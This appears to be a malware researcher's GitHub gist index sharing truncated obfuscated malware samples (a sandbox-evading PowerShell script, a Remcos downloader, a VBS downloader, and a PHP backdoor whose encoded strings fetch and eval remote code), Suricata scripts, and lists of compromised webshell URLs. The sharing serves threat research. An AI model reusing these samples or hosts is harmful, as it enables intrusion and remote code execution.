Skip to content

Instantly share code, notes, and snippets.

View jstrosch's full-sized avatar

Josh Stroschein jstrosch

666 followers · 25 following
View GitHub Profile
@jstrosch
jstrosch / gist:352b309a576a1654c6588eb9dcba6d9d
Created September 30, 2022 18:41
Obfuscated script found at https://thevalueofamoment.com/wp-content/plugins/maintenance/images/
This file has been truncated, but you can view the full file.
$Hl68 =[tyPe]("{2}{9}{5}{1}{7}{4}{6}{0}{8}{3}{10}"-f 'MPR','O.','sY','oN','ssIon.C','tEM.i','o','cOmpRe','ESSi','s','mODe') ; $tEuwx =[Type]("{3}{2}{0}{1}" -F 's','TEm.cONverT','Y','s'); Set ("{1}{0}"-f'e','PdWj') ([TYpe]("{2}{3}{0}{1}{4}"-F 'm','.Io','Sy','sTE','.fILe') ) ; ${s`crip`Tpath} = &("{2}{0}{1}"-f'pli','t-path','s') -parent ${m`Yi`NvoCa`TIoN}."MYC`omM`AND"."d`EFinitI`oN"
if (${sCR`i`P`TPath} -match ("{0}{1}" -f 'av','ast')) {exit}
if (${SCR`IP`TP`ATh} -match "avg") {exit}
if (${s`CrIpTp`A`Th} -match ("{1}{0}"-f 'le','samp')) {exit}
if (${SCr`IPTp`ATH} -match ("{0}{2}{1}" -f'anal','s','ysi')) {exit}
if (${sc`RIpT`paTh} -match ("{1}{2}{0}" -f're','malw','a')) {exit}
if (${SC`RI`PTP`Ath} -match ("{1}{2}{0}" -f'x','sand','bo')) {exit}
if (${Sc`Rip`TP`ATh} -match ("{0}{1}" -f 'v','irus')) {exit}
@jstrosch
jstrosch / gist:e3ffda2d30ed6597b886bf88946f3f76
Created August 5, 2022 13:36
Obfuscateed Powershell that Downloads Remcos
Discovered through an open directory at: hxxps://instment[.]ga/wipper/
Original hash of attack.txt file (the code here): e7ecdedad56effcf92ba01081441e033e2564e4eb24720de55e6d84858958291
## BEGIN Powershell ##
$t0='QE150'.replace('Q','I').replace('150','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,011
@jstrosch
jstrosch / gist:5437b9387580b255fefa7e903c908189
Created August 2, 2022 03:29
Obfuscated VBS Downloader Script
Discovered through an open directory at: hxxp://files.ddrive[.]online/
Original hash of VBS script (MD5): 8a9598f45a06e0c372b19cfacb4bb2a6
## BEGIN VBS ###
On Error Resume Next
bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:
bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:
bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:
bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:
bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:bobmarley:tropado7:queroverquempega = "☀☀☀☀☀☀☀":l:cego:
@jstrosch
jstrosch / gist:6746b6a59a1a01acce0c96b4863d805a
Created July 28, 2022 00:39
Obfuscated PHP backdoor challenge :)
Initially reported distributing Emotet on URLHaus: https://urlhaus.abuse.ch/browse.php?search=+http%3A%2F%2Fsolr.yakari.id
Discovered through an open directory at: hxxp://solr.yakari[.]id/wp-content/mu-plugins-old/index.php.suspected
Original hash of PHP file: dacc0f895428822979bda234f4f15bfe
## BEGIN PHP ##
$uoeq967= "O)sl 2Te4x-+gazAbuK_6qrjH0RZt*N3mLcVFEWvh;inySJC91oMfYXId5Up.(GP7D,Bw/kQ8";$vpna644='JGNoID0gY3VybF9pbml0KCdodHRwOi8vYmFua3N';$vpna645='zdG9wLnRlY2gvJy4kX0dFVFsnZiddKTtjdXJsX3';$vpna646='NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBT';$vpna647='lNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMo';$vpna648='JGNoKTtldmFsKCc/PicuJHJlc3VsdCk7';$vpna643=$vpna644.$vpna645.$vpna646.$vpna647.$vpna648;function cdim173($fsxi199,$rykc638,$ekcu564){return ''.$fsxi199.''.$rykc638.''.$ekcu564.'';}$qfcg427 = cdim173($uoeq967{34},$uoeq967{13}.$uoeq967{3},$uoeq967{3});$uodu186 = cdim173($uoeq967{19}.$uoeq967{17},$uoeq967{2}.$uoeq967{7},'');$lrbk358 = cdim173($uoeq967{22},$uoeq967{19},$uoeq967{52});$hume205 = cdim173($uoeq967{1
@jstrosch
jstrosch / keybase.md
Created July 19, 2022 13:36

Keybase proof

I hereby claim:

  • I am jstrosch on github.
  • I am jstrosch (https://keybase.io/jstrosch) on keybase.
  • I have a public key ASDkmIOHHVo_eM7no0mxaZUOKWRxavuanSwN1FhI2GLbogo

To claim this, I am signing this object:

@jstrosch
jstrosch / suri-ingest-pcap.sh
Last active April 24, 2024 01:15
#!/usr/bin/env bash
PCAPFILE=$1
LOG_LOCATION='/tmp/suricata/'
if [ -z $PCAPFILE ] || [ ! -f $PCAPFILE ]; then
echo "File ${PCAPFILE} doesnt seem to be there - please supply a pcap file."
exit 1;
fi
@jstrosch
jstrosch / suri-replay-pcap.sh
Last active April 18, 2022 23:37
#!/usr/bin/env bash
SESSION_USER=$(logname)
PCAPFILE=$1
if (( $EUID != 0 )); then
echo -e "Please run this script as root or with \"sudo\".\n"
exit 1
fi
@jstrosch
jstrosch / setup-dummy-interface.sh
Created April 6, 2022 22:11
#! /bin/sh
set -e
echo "Removing existing dummy interface."
nmcli con delete dummy-dummy0 || true
echo "Adding dummy0."
nmcli con add ifname dummy0 type dummy ipv4.method link-local
@jstrosch
jstrosch / gist:c07ad8f59e50b21a7304aa34044a5b92
Created October 22, 2021 16:22
password-protected webshells and PE payloads from Dridex-tagged URLs via URLHaus
<===== WEBSHELLS =====>
[*] Shell SHA256: 6abf737186523a962f94e0e6b6bed5f5ab9238d3fddfc173d8ef83b67400d4ca
[HOST] https://regiontreasure.com/js/vendor/option.php
[HOST] https://reportingdashboard.mobilisedev.co.uk/includes/app.core.php
[HOST] https://eflcc.in/images/prettyPhoto/dark_rounded/authorize.php
[HOST] https://chains.lookarma.com.br/wp-includes/sodium_compat/src/Core/Base64/class.core.php
[HOST] https://reviewgrenade.com/wp-content/themes/blossom-fashion/inc/css/lib.php
[HOST] https://www.turksagroup.com/wp-content/plugins/redux-framework/redux-core/appsero/app.class.php
[HOST] https://stockmanager.upd.work/themes/default/views/auth/email/lib.api.php
[HOST] https://demo.usa-mycard.com/sql/class.cache.php
@jstrosch
jstrosch / gist:407378e4f6dbf1261ba564d872c3ff76
Created August 10, 2021 21:57
Originally reported: https://twitter.com/James_inthe_box/status/1425187264435429378
2021-08-10 14:47:22,752 — SubCrawl — INFO — [YARA] Matches - protected_webshell (https://regiontreasure.com/js/vendor/option.php )
2021-08-10 14:47:24,001 — SubCrawl — INFO — [YARA] Matches - protected_webshell (https://ishaninfocom.com/images/Newimage/core.lib.php )
2021-08-10 14:48:16,637 — SubCrawl — INFO — [YARA] Matches - protected_webshell (https://glasstryon.com/webcamjs/flash/com/adobe/images/viewer.php )
2021-08-10 14:48:32,720 — SubCrawl — INFO — [YARA] Matches - protected_webshell (https://toucan.webiknows.net/vendor/swiper/css/type.php )
2021-08-10 14:49:03,635 — SubCrawl — INFO — [YARA] Matches - protected_webshell (https://essennvalves.in/essennvalves.in/plugins/material-design-iconic-font/css/app.class.php )
2021-08-10 14:49:47,965 — SubCrawl — INFO — [YARA] Matches - protected_webshell (https://elearning.thegurukulonline.com/class_8/Computer/app.class.php )
2021-08-10 14:50:36,629 — SubCrawl — INFO — [YARA] Ma